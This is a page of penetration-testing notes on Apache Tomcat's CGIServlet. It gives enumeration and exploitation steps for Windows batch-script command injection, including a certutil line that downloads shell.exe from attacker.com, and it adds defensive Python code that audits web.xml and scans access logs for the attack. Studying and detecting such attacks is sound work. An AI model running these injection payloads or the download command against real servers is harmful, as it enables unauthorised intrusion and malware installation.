Tomcat CGI
Tomcat CGI (Common Gateway Interface) is a feature in Apache Tomcat that allows the server to execute external scripts, such as Perl, Python, or shell scripts, in response to HTTP requests. This functionality enables dynamic content generation, similar to how traditional CGI works in other web servers like Apache HTTP Server. However, unlike servlets and JSP, CGI scripts run as separate processes, which can introduce performance overhead.
In Tomcat, CGI support is provided via the CGIServlet, which must be explicitly enabled in the web.xml configuration file. The servlet maps incoming requests to CGI scripts located in a specified directory, executing them and returning the output as an HTTP response. While this provides flexibility, it is generally discouraged due to security risks and inefficiency compared to modern alternatives like servlets, JSP, or frameworks such as Spring.
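Because the risk hinges on how the CGIServlet is declared in web.xml, a quick way to audit a deployment is to parse that file and report every CGIServlet mapping together with its enableCmdLineArguments setting (Tomcat's own init-param, which defaults to false in current releases and, when true, lets query-string text reach the script as command-line arguments). The following is an added example, not code from the original page or from the Tomcat project; the two web.xml fragments are constructed here to show the weak setting beside the hardened one, and the /cgi/* mapping mirrors the path used in the notes above.

```python
"""Audit a Tomcat web.xml for CGIServlet exposure (added example, constructed input)."""
import xml.etree.ElementTree as ET

CGI_SERVLET_CLASS = "org.apache.catalina.servlets.CGIServlet"

# Constructed sample: CGIServlet enabled with the weak setting that lets
# query-string text reach the script as command-line arguments.
WEAK_WEB_XML = """<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="4.0">
  <servlet>
    <servlet-name>cgi</servlet-name>
    <servlet-class>org.apache.catalina.servlets.CGIServlet</servlet-class>
    <init-param>
      <param-name>cgiPathPrefix</param-name>
      <param-value>WEB-INF/cgi</param-value>
    </init-param>
    <init-param>
      <param-name>enableCmdLineArguments</param-name>
      <param-value>true</param-value>
    </init-param>
    <load-on-startup>5</load-on-startup>
  </servlet>
  <servlet-mapping>
    <servlet-name>cgi</servlet-name>
    <url-pattern>/cgi/*</url-pattern>
  </servlet-mapping>
</web-app>
"""

# Same deployment with the hardened setting (the Tomcat default).
HARDENED_WEB_XML = WEAK_WEB_XML.replace(
    "<param-value>true</param-value>", "<param-value>false</param-value>")


def _local(tag):
    """Strip the XML namespace so the audit works for any web-app schema version."""
    return tag.rsplit("}", 1)[-1]


def _text(el):
    return (el.text or "").strip()


def audit_cgi_servlet(web_xml_text):
    """Return one finding per CGIServlet declared in the given web.xml text.

    Each finding records the servlet name, its URL patterns, whether
    enableCmdLineArguments is on, and a severity: 'high' when command-line
    arguments are enabled, 'medium' for any CGIServlet exposure at all.
    """
    root = ET.fromstring(web_xml_text)
    servlets = {}   # servlet-name -> init-param dict, CGIServlet only
    patterns = {}   # servlet-name -> list of url-patterns
    for el in root:
        tag = _local(el.tag)
        if tag == "servlet":
            name = cls = None
            params = {}
            for child in el:
                ctag = _local(child.tag)
                if ctag == "servlet-name":
                    name = _text(child)
                elif ctag == "servlet-class":
                    cls = _text(child)
                elif ctag == "init-param":
                    pname = pvalue = None
                    for p in child:
                        if _local(p.tag) == "param-name":
                            pname = _text(p)
                        elif _local(p.tag) == "param-value":
                            pvalue = _text(p)
                    if pname is not None:
                        params[pname] = pvalue
            if cls == CGI_SERVLET_CLASS and name:
                servlets[name] = params
        elif tag == "servlet-mapping":
            name = None
            pats = []
            for child in el:
                ctag = _local(child.tag)
                if ctag == "servlet-name":
                    name = _text(child)
                elif ctag == "url-pattern":
                    pats.append(_text(child))
            if name:
                patterns.setdefault(name, []).extend(pats)
    findings = []
    for name, params in servlets.items():
        enabled = (params.get("enableCmdLineArguments") or "false").lower() == "true"
        findings.append({
            "servlet": name,
            "url_patterns": patterns.get(name, []),
            "enableCmdLineArguments": enabled,
            "severity": "high" if enabled else "medium",
        })
    return findings


if __name__ == "__main__":
    for label, xml in (("weak", WEAK_WEB_XML), ("hardened", HARDENED_WEB_XML)):
        print(label, audit_cgi_servlet(xml))
```

Run it against the real web.xml of each deployed context (and the global conf/web.xml); any finding at all means CGI is switched on, and a "high" finding is the configuration the exploitation notes below depend on.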
Enumeration
- We can hunt for Apache Tomcat on a server using Nmap output.
- Hunt for CGI scripts, which are normally located at https://ip:port/cgi. We can then fuzz for /cgi/FUZZ.cmd or /cgi/FUZZ.bat, as we are targeting .bat or .cmd files since this exploit is specifically for Windows.
Exploitation
- Locate the CGI script file, e.g., http://rezydev.xyz/cgi/script.bat.
- Append & followed by the command, e.g., http://rezydev.xyz/cgi/script.bat?&dir, which lists directories.
We can use /cgi/script.bat?&set to look for environment variables. If the PATH variable isn’t set, we need to execute binaries by specifying the full path. For example:
- C:\Windows\System32\whoami.exe – Identifies the current user.
- C:\Windows\System32\cmd.exe /c ipconfig – Displays network configuration.
- C:\Windows\System32\tasklist.exe – Lists running processes.
- C:\Windows\System32\net.exe user – Displays user accounts on the system.
- C:\Windows\System32\certutil.exe -urlcache -f http://attacker.com/shell.exe shell.exe – Downloads a file from a remote server.
Note: URL-encode the payload if we get an error.
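From the detection side, the pattern described in this section is visible in Tomcat's access log: a request to a .bat or .cmd script under /cgi/ whose query string carries a bare, "&"-separated token with no "=" (such as "&dir" or "&set"), possibly percent-encoded as the note above suggests. The following is an added example, not code from the original page; the log lines are constructed in common log format and the /cgi/ path and .bat/.cmd extensions are taken from the notes, while the decode-before-match step is what defeats the URL-encoding the note describes.

```python
"""Flag Tomcat CGI requests whose query string looks like command injection (added example)."""
import re
from urllib.parse import unquote, urlsplit

# Constructed access-log lines in Tomcat's common log format; not from a real host.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /cgi/script.bat HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /cgi/script.bat?&dir HTTP/1.1" 200 2048
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /cgi/script.bat?%26set HTTP/1.1" 200 1900
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /cgi/report.cmd?name=bob&format=csv HTTP/1.1" 200 300
10.0.0.8 - - [01/Jan/2024:10:00:05 +0000] "GET /index.jsp?&x HTTP/1.1" 200 100
"""

# Common log format: client, ident, user, [timestamp], "METHOD target PROTOCOL", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')
# Windows batch scripts served through the CGI prefix used in the notes above.
CGI_SCRIPT_RE = re.compile(r"^/cgi/[^?]*\.(bat|cmd)$", re.IGNORECASE)


def decode_fully(s, rounds=3):
    """Percent-decode repeatedly so %2526-style double encoding does not evade the check."""
    for _ in range(rounds):
        new = unquote(s)
        if new == s:
            break
        s = new
    return s


def suspicious_query(query):
    """True if the decoded query has '&' and any segment lacks '=' (a bare token such as 'dir')."""
    decoded = decode_fully(query)
    if "&" not in decoded:
        return False
    return any(seg and "=" not in seg for seg in decoded.split("&"))


def find_cgi_injection(log_text):
    """Return (client ip, decoded request target) for each request that hits a
    .bat/.cmd script under /cgi/ with a query string containing a bare token."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        parts = urlsplit(m.group("target"))
        if not CGI_SCRIPT_RE.match(decode_fully(parts.path)):
            continue
        if suspicious_query(parts.query):
            hits.append((m.group("ip"), decode_fully(m.group("target"))))
    return hits


if __name__ == "__main__":
    for ip, target in find_cgi_injection(SAMPLE_LOG):
        print(f"suspicious CGI request from {ip}: {target}")
```

The check deliberately ignores ordinary key=value queries to a .cmd script (the report.cmd line) and bare tokens sent to non-CGI paths (the index.jsp line); a site whose scripts legitimately accept value-less parameters will need the bare-token rule tightened to its own parameter names.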